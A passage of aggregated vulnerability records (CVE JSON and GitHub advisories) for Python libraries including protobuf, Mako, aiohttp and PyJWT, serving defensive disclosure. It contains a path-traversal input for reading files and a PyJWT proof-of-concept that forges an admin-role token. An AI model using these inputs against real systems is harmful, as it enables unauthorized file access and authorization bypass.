"url": "https://access.redhat.com/errata/RHSA-2026:8747"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:3959: Red Hat Ansible Automation Platform 2.5 for RHEL 8, Red Hat Ansible Automation Platform 2.5 for RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:3958: Red Hat Ansible Automation Platform 2.6 for RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:3218: Red Hat Enterprise Linux AppStream EUS (v. 10.0), Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)"
},
{
"lang": "en",
"value": "RHSA-2026:3094: Red Hat Enterprise Linux AppStream (v. 10), Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)"
},
{
"lang": "en",
"value": "RHSA-2026:3097: Red Hat Enterprise Linux AppStream E4S (v.9.0)"
},
{
"lang": "en",
"value": "RHSA-2026:3220: Red Hat Enterprise Linux AppStream E4S (v.9.2)"
},
{
"lang": "en",
"value": "RHSA-2026:3059: Red Hat CodeReady Linux Builder EUS (v.9.4), Red Hat Enterprise Linux AppStream EUS (v.9.4)"
},
{
"lang": "en",
"value": "RHSA-2026:3219: Red Hat CodeReady Linux Builder EUS (v.9.6), Red Hat Enterprise Linux AppStream EUS (v.9.6)"
},
{
"lang": "en",
"value": "RHSA-2026:3095: Red Hat Enterprise Linux AppStream (v. 9), Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)"
},
{
"lang": "en",
"value": "RHSA-2026:3461: Red Hat AI Inference Server 3.2"
},
{
"lang": "en",
"value": "RHSA-2026:3462: Red Hat AI Inference Server 3.2"
},
{
"lang": "en",
"value": "RHSA-2026:8748: Red Hat AI Inference Server 3.3"
},
{
"lang": "en",
"value": "RHSA-2026:8746: Red Hat AI Inference Server 3.3"
},
{
"lang": "en",
"value": "RHSA-2026:8747: Red Hat AI Inference Server 3.3"
},
{
"lang": "en",
"value": "RHSA-2026:16174: Red Hat AI Inference Server 3.3"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-01-23T16:02:59.235Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-01-23T14:55:16.876Z",
"value": "Made public."
}
],
"title": "python: protobuf: Protobuf: Denial of Service due to recursion depth bypass",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Protobuf",
"vendor": "Python",
"versions": [
{
"status": "affected",
"version": "\u003c=v33.4",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eA denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eDue to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python\u2019s recursion stack and causing a RecursionError.\u003c/span\u003e\u003cbr\u003e"
}
],
"value": "A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.\n\nDue to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python\u2019s recursion stack and causing a RecursionError."
}
],
"impacts": [
{
"capecId": "CAPEC-147",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-147: XML Nested Entity Expansion"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "LOW",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-674",
"description": "CWE-674: Uncontrolled Recursion",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-30T14:28:11.435Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"url": "https://github.com/protocolbuffers/protobuf/pull/25239"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Denial of Service in Python Protobuf",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2026-0994",
"datePublished": "2026-01-23T14:55:16.876Z",
"dateReserved": "2026-01-15T15:16:22.904Z",
"dateUpdated": "2026-06-30T12:07:10.896Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-41205 (GCVE-0-2026-41205)
Vulnerability from cvelistv5 – Published: 2026-04-23 18:52 – Updated: 2026-05-20 01:32- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| sqlalchemy | mako |
Affected:
< 1.3.11
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-41205",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-23T20:20:51.233790Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-23T20:20:59.107Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "mako",
"vendor": "sqlalchemy",
"versions": [
{
"status": "affected",
"version": "\u003c 1.3.11"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Mako is a template library written in Python. Prior to 1.3.11, TemplateLookup.get_template() is vulnerable to path traversal when a URI starts with // (e.g., //../../../secret.txt). The root cause is an inconsistency between two slash-stripping implementations. Any file readable by the process can be returned as rendered template content when an application passes untrusted input directly to TemplateLookup.get_template(). This vulnerability is fixed in 1.3.11."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-20T01:32:18.382Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/sqlalchemy/mako/security/advisories/GHSA-v92g-xgxw-vvmm",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/sqlalchemy/mako/security/advisories/GHSA-v92g-xgxw-vvmm"
},
{
"name": "https://github.com/sqlalchemy/mako/commit/e05ac61989a7fb9dd7dcde6cfd72dc48328719a3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/sqlalchemy/mako/commit/e05ac61989a7fb9dd7dcde6cfd72dc48328719a3"
},
{
"name": "https://github.com/sqlalchemy/mako/releases/tag/rel_1_3_11",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/sqlalchemy/mako/releases/tag/rel_1_3_11"
}
],
"source": {
"advisory": "GHSA-v92g-xgxw-vvmm",
"discovery": "UNKNOWN"
},
"title": "Mako: Path traversal via double-slash URI prefix in TemplateLookup"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-41205",
"datePublished": "2026-04-23T18:52:24.194Z",
"dateReserved": "2026-04-18T02:51:52.974Z",
"dateUpdated": "2026-05-20T01:32:18.382Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-32962 (GCVE-0-2025-32962)
Vulnerability from cvelistv5 – Published: 2025-05-16 13:51 – Updated: 2025-05-16 14:53- CWE-601 - URL Redirection to Untrusted Site ('Open Redirect')
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| dpgaspar | Flask-AppBuilder |
Affected:
< 4.6.2
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-32962",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-16T14:53:44.576705Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-05-16T14:53:52.917Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Flask-AppBuilder",
"vendor": "dpgaspar",
"versions": [
{
"status": "affected",
"version": "\u003c 4.6.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Flask-AppBuilder is an application development framework built on top of Flask. Versions prior to 4.6.2 would allow for a malicious unauthenticated actor to perform an open redirect by manipulating the Host header in HTTP requests. Flask-AppBuilder 4.6.2 introduced the `FAB_SAFE_REDIRECT_HOSTS` configuration variable, which allows administrators to explicitly define which domains are considered safe for redirection. As a workaround, use a reverse proxy to enforce trusted host headers."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-601",
"description": "CWE-601: URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-05-16T13:51:55.581Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-99pm-ch96-ccp2",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-99pm-ch96-ccp2"
},
{
"name": "https://github.com/dpgaspar/Flask-AppBuilder/commit/32eedbbb5cb483a3e782c5f2732de4a6a650d9b6",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dpgaspar/Flask-AppBuilder/commit/32eedbbb5cb483a3e782c5f2732de4a6a650d9b6"
}
],
"source": {
"advisory": "GHSA-99pm-ch96-ccp2",
"discovery": "UNKNOWN"
},
"title": "Flask-AppBuilder open redirect vulnerability using HTTP host injection"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-32962",
"datePublished": "2025-05-16T13:51:55.581Z",
"dateReserved": "2025-04-14T21:47:11.453Z",
"dateUpdated": "2025-05-16T14:53:52.917Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2026-21226 (GCVE-0-2026-21226)
Vulnerability from cvelistv5 – Published: 2026-01-13 18:04 – Updated: 2026-04-01 13:49- CWE-502 - Deserialization of Untrusted Data
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Microsoft | Azure Core shared client library for Python |
Affected:
1.1.0 , < 1.38.0
(custom)
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-21226",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-13T18:28:13.612748Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T18:28:47.587Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Azure Core shared client library for Python",
"vendor": "Microsoft",
"versions": [
{
"lessThan": "1.38.0",
"status": "affected",
"version": "1.1.0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:azure_core_shared_client_library_for_python:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.38.0",
"versionStartIncluding": "1.1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"datePublic": "2026-01-13T16:00:00.000Z",
"descriptions": [
{
"lang": "en-US",
"value": "Deserialization of untrusted data in Azure Core shared client library for Python allows an authorized attacker to execute code over a network."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en-US",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-502",
"description": "CWE-502: Deserialization of Untrusted Data",
"lang": "en-US",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T13:49:21.414Z",
"orgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
"shortName": "microsoft"
},
"references": [
{
"name": "Azure Core shared client library for Python Remote Code Execution Vulnerability",
"tags": [
"vendor-advisory",
"patch"
],
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21226"
}
],
"title": "Azure Core shared client library for Python Remote Code Execution Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
"assignerShortName": "microsoft",
"cveId": "CVE-2026-21226",
"datePublished": "2026-01-13T18:04:55.084Z",
"dateReserved": "2025-12-11T21:02:05.732Z",
"dateUpdated": "2026-04-01T13:49:21.414Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
GHSA-6JHG-HG63-JVVF
Vulnerability from github – Published: 2026-01-05 23:13 – Updated: 2026-01-06 16:06Summary
A request can be crafted in such a way that an aiohttp server's memory fills up uncontrollably during processing.
Impact
If an application includes a handler that uses the Request.post() method, an attacker may be able to freeze the server by exhausting the memory.
Patch: https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.2"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-69228"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-05T23:13:14Z",
"nvd_published_at": "2026-01-06T00:15:48Z",
"severity": "MODERATE"
},
"details": "### Summary\nA request can be crafted in such a way that an aiohttp server\u0027s memory fills up uncontrollably during processing.\n\n### Impact\nIf an application includes a handler that uses the `Request.post()` method, an attacker may be able to freeze the server by exhausting the memory.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60",
"id": "GHSA-6jhg-hg63-jvvf",
"modified": "2026-01-06T16:06:55Z",
"published": "2026-01-05T23:13:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6jhg-hg63-jvvf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69228"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP vulnerable to denial of service through large payloads"
}
GHSA-54JQ-C3M8-4M76
Vulnerability from github – Published: 2026-01-05 23:09 – Updated: 2026-01-06 16:06Summary
Path normalization for static files prevents path traversal, but opens up the ability for an attacker to ascertain the existence of absolute path components.
Impact
If an application uses web.static() (not recommended for production deployments), it may be possible for an attacker to ascertain the existence of path components.
Patch: https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.2"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-69226"
],
"database_specific": {
"cwe_ids": [
"CWE-202",
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-05T23:09:51Z",
"nvd_published_at": "2026-01-05T23:15:40Z",
"severity": "LOW"
},
"details": "### Summary\nPath normalization for static files prevents path traversal, but opens up the ability for an attacker to ascertain the\nexistence of absolute path components.\n\n### Impact\nIf an application uses `web.static()` (not recommended for production deployments), it may be possible for an attacker to ascertain the existence of path components.\n\n------\n\nPatch: https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e",
"id": "GHSA-54jq-c3m8-4m76",
"modified": "2026-01-06T16:06:47Z",
"published": "2026-01-05T23:09:51Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-54jq-c3m8-4m76"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69226"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP vulnerable to brute-force leak of internal static \ufb01le path components"
}
GHSA-752W-5FWX-JX9F
Vulnerability from github – Published: 2026-03-13 20:05 – Updated: 2026-06-08 19:06Summary
PyJWT does not validate the crit (Critical) Header Parameter defined in
RFC 7515 §4.1.11. When a JWS token contains a crit array listing
extensions that PyJWT does not understand, the library accepts the token
instead of rejecting it. This violates the MUST requirement in the RFC.
This is the same class of vulnerability as CVE-2025-59420 (Authlib), which received CVSS 7.5 (HIGH).
RFC Requirement
RFC 7515 §4.1.11:
The "crit" (Critical) Header Parameter indicates that extensions to this specification and/or [JWA] are being used that MUST be understood and processed. [...] If any of the listed extension Header Parameters are not understood and supported by the recipient, then the JWS is invalid.
Proof of Concept
import jwt # PyJWT 2.8.0
import hmac, hashlib, base64, json
# Construct token with unknown critical extension
header = {"alg": "HS256", "crit": ["x-custom-policy"], "x-custom-policy": "require-mfa"}
payload = {"sub": "attacker", "role": "admin"}
def b64url(data):
return base64.urlsafe_b64encode(data).rstrip(b"=").decode()
h = b64url(json.dumps(header, separators=(",", ":")).encode())
p = b64url(json.dumps(payload, separators=(",", ":")).encode())
sig = b64url(hmac.new(b"secret", f"{h}.{p}".encode(), hashlib.sha256).digest())
token = f"{h}.{p}.{sig}"
# Should REJECT — x-custom-policy is not understood by PyJWT
try:
result = jwt.decode(token, "secret", algorithms=["HS256"])
print(f"ACCEPTED: {result}")
# Output: ACCEPTED: {'sub': 'attacker', 'role': 'admin'}
except Exception as e:
print(f"REJECTED: {e}")
Expected: jwt.exceptions.InvalidTokenError: Unsupported critical extension: x-custom-policy
Actual: Token accepted, payload returned.
Comparison with RFC-compliant library
# jwcrypto — correctly rejects
from jwcrypto import jwt as jw_jwt, jwk
key = jwk.JWK(kty="oct", k=b64url(b"secret"))
jw_jwt.JWT(jwt=token, key=key, algs=["HS256"])
# raises: InvalidJWSObject('Unknown critical header: "x-custom-policy"')
Impact
- Split-brain verification in mixed-library deployments (e.g., API gateway using jwcrypto rejects, backend using PyJWT accepts)
- Security policy bypass when
critcarries enforcement semantics (MFA, token binding, scope restrictions) - Token binding bypass — RFC 7800
cnf(Proof-of-Possession) can be silently ignored - See CVE-2025-59420 for full impact analysis
Suggested Fix
In jwt/api_jwt.py, add validation in _validate_headers() or
decode():
_SUPPORTED_CRIT = {"b64"} # Add extensions PyJWT actually supports
def _validate_crit(self, headers: dict) -> None:
crit = headers.get("crit")
if crit is None:
return
if not isinstance(crit, list) or len(crit) == 0:
raise InvalidTokenError("crit must be a non-empty array")
for ext in crit:
if ext not in self._SUPPORTED_CRIT:
raise InvalidTokenError(f"Unsupported critical extension: {ext}")
if ext not in headers:
raise InvalidTokenError(f"Critical extension {ext} not in header")
CWE
- CWE-345: Insufficient Verification of Data Authenticity
- CWE-863: Incorrect Authorization
References
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.11.0"
},
"package": {
"ecosystem": "PyPI",
"name": "PyJWT"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.12.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32597"
],
"database_specific": {
"cwe_ids": [
"CWE-345",
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-13T20:05:04Z",
"nvd_published_at": "2026-03-13T19:55:09Z",
"severity": "HIGH"
},
"details": "## Summary\n\nPyJWT does not validate the `crit` (Critical) Header Parameter defined in\nRFC 7515 \u00a74.1.11. When a JWS token contains a `crit` array listing\nextensions that PyJWT does not understand, the library accepts the token\ninstead of rejecting it. This violates the **MUST** requirement in the RFC.\n\nThis is the same class of vulnerability as CVE-2025-59420 (Authlib),\nwhich received CVSS 7.5 (HIGH).\n\n---\n\n## RFC Requirement\n\nRFC 7515 \u00a74.1.11:\n\n\u003e The \"crit\" (Critical) Header Parameter indicates that extensions to this\n\u003e specification and/or [JWA] are being used that **MUST** be understood and\n\u003e processed. [...] If any of the listed extension Header Parameters are\n\u003e **not understood and supported** by the recipient, then the **JWS is invalid**.\n\n---\n\n## Proof of Concept\n\n```python\nimport jwt # PyJWT 2.8.0\nimport hmac, hashlib, base64, json\n\n# Construct token with unknown critical extension\nheader = {\"alg\": \"HS256\", \"crit\": [\"x-custom-policy\"], \"x-custom-policy\": \"require-mfa\"}\npayload = {\"sub\": \"attacker\", \"role\": \"admin\"}\n\ndef b64url(data):\n return base64.urlsafe_b64encode(data).rstrip(b\"=\").decode()\n\nh = b64url(json.dumps(header, separators=(\",\", \":\")).encode())\np = b64url(json.dumps(payload, separators=(\",\", \":\")).encode())\nsig = b64url(hmac.new(b\"secret\", f\"{h}.{p}\".encode(), hashlib.sha256).digest())\ntoken = f\"{h}.{p}.{sig}\"\n\n# Should REJECT \u2014 x-custom-policy is not understood by PyJWT\ntry:\n result = jwt.decode(token, \"secret\", algorithms=[\"HS256\"])\n print(f\"ACCEPTED: {result}\")\n # Output: ACCEPTED: {\u0027sub\u0027: \u0027attacker\u0027, \u0027role\u0027: \u0027admin\u0027}\nexcept Exception as e:\n print(f\"REJECTED: {e}\")\n```\n\n**Expected:** `jwt.exceptions.InvalidTokenError: Unsupported critical extension: x-custom-policy`\n**Actual:** Token accepted, payload returned.\n\n### Comparison with RFC-compliant library\n\n```python\n# jwcrypto \u2014 correctly rejects\nfrom jwcrypto import jwt as jw_jwt, jwk\nkey = jwk.JWK(kty=\"oct\", k=b64url(b\"secret\"))\njw_jwt.JWT(jwt=token, key=key, algs=[\"HS256\"])\n# raises: InvalidJWSObject(\u0027Unknown critical header: \"x-custom-policy\"\u0027)\n```\n\n---\n\n## Impact\n\n- **Split-brain verification** in mixed-library deployments (e.g., API\n gateway using jwcrypto rejects, backend using PyJWT accepts)\n- **Security policy bypass** when `crit` carries enforcement semantics\n (MFA, token binding, scope restrictions)\n- **Token binding bypass** \u2014 RFC 7800 `cnf` (Proof-of-Possession) can be\n silently ignored\n- See CVE-2025-59420 for full impact analysis\n\n---\n\n## Suggested Fix\n\nIn `jwt/api_jwt.py`, add validation in `_validate_headers()` or\n`decode()`:\n\n```python\n_SUPPORTED_CRIT = {\"b64\"} # Add extensions PyJWT actually supports\n\ndef _validate_crit(self, headers: dict) -\u003e None:\n crit = headers.get(\"crit\")\n if crit is None:\n return\n if not isinstance(crit, list) or len(crit) == 0:\n raise InvalidTokenError(\"crit must be a non-empty array\")\n for ext in crit:\n if ext not in self._SUPPORTED_CRIT:\n raise InvalidTokenError(f\"Unsupported critical extension: {ext}\")\n if ext not in headers:\n raise InvalidTokenError(f\"Critical extension {ext} not in header\")\n```\n\n---\n\n## CWE\n\n- CWE-345: Insufficient Verification of Data Authenticity\n- CWE-863: Incorrect Authorization\n\n## References\n\n- [RFC 7515 \u00a74.1.11](https://www.rfc-editor.org/rfc/rfc7515.html#section-4.1.11)\n- [CVE-2025-59420 \u2014 Authlib crit bypass (CVSS 7.5)](https://osv.dev/vulnerability/GHSA-9ggr-2464-2j32)\n- [RFC 7800 \u2014 Proof-of-Possession Key Semantics](https://www.rfc-editor.org/rfc/rfc7800)",
"id": "GHSA-752w-5fwx-jx9f",
"modified": "2026-06-08T19:06:39Z",
"published": "2026-03-13T20:05:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-752w-5fwx-jx9f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32597"
},
{
"type": "PACKAGE",
"url": "https://github.com/jpadilla/pyjwt"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyjwt/PYSEC-2026-120.yaml"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2026/05/msg00008.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "PyJWT accepts unknown `crit` header extensions"
}
GHSA-5239-WWWM-4PMQ
Vulnerability from github – Published: 2026-03-22 06:30 – Updated: 2026-03-30 14:40A security flaw has been discovered in pygments before 2.20.0. The impacted element is the function AdlLexer of the file pygments/lexers/archetype.py. The manipulation results in inefficient regular expression complexity. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "Pygments"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.20.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-4539"
],
"database_specific": {
"cwe_ids": [
"CWE-1333",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-24T20:33:39Z",
"nvd_published_at": "2026-03-22T06:16:20Z",
"severity": "LOW"
},
"details": "A security flaw has been discovered in pygments before 2.20.0. The impacted element is the function AdlLexer of the file pygments/lexers/archetype.py. The manipulation results in inefficient regular expression complexity. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.",
"id": "GHSA-5239-wwwm-4pmq",
"modified": "2026-03-30T14:40:28Z",
"published": "2026-03-22T06:30:15Z",
"references": [
{
